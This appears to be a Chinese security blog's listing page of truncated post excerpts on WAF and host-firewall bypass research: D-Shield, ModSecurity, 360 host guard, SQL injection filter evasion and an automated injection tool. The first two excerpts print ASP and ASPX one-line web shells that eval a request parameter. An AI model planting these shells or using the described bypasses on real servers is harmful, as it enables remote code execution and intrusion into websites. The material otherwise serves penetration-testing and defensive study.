ASP一句話木馬收集： <%eval request("chopper")%> <%execute request("chopper")%> <%exe ...

aspx木馬收集： <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> ...

0x01 前言 　　在測試過程中，經常會遇到一些主機防護軟件，對這方面做了一些嘗試，可成功bypass了GET和POST的注入防御，分享一下姿勢。 0x02 環境搭建 Windows Serve ...

0X01 前言 　　D盾_IIS防火牆，目前只支持Win2003服務器，前陣子看見官方博客說D盾新版將近期推出，相信功能會更強大，這邊分享一下之前的SQL注入防御的測試情況。D盾_IIS防火牆注入防 ...

ModSecurity 是一款開源Web應用防火牆，支持Apache/Nginx/IIS,可作為服務器基礎安全設施，還是不錯的選擇。 系統環境：window 2008 R2+IIS 7 0X01 ...

0x01 前言 　　在一些網站通常會在公用文件引入全局防護代碼進行SQL注入、XSS跨站腳本等漏洞的防御，在一定程度上對網站安全防護還是比較有效的。 　　這里討論一下關鍵字過濾不完善及常見正則匹配 ...

0x01 前言 　　一直在思考如何編寫一個自動化注入工具，這款工具不用太復雜，但是可以用最簡單、最直接的方式來獲取數據庫信息，根據自定義構造的payload來繞過防護，這樣子就可以。 0x02 ...

　　​ 梳理了一下自己寫過的WAF Bypass相關的文章，按照編寫時間順序，整理成了一個WAF Bypass實戰系列，如果你准備了解WAF攻防這一塊的內容，可以來了解一下。 第一篇：《Byp ...

在WAF防護逐漸盛行的前幾年，我曾研究過各種WAF繞過的技巧，也曾突破過各種各樣的WAF防護。最近，准備重新梳理下自己的知識體系，於是，我將自己寫過的關於WAF攻防相關的文章內容合並到一個文檔，並形成 ...

0x00 前言 在服務器客戶端領域，曾經出現過一款360主機衛士，目前已停止更新和維護，官網都打不開了，但服務器中依然經常可以看到它的身影。從半年前的測試虛擬機里面，翻出了360主機衛士Apache ...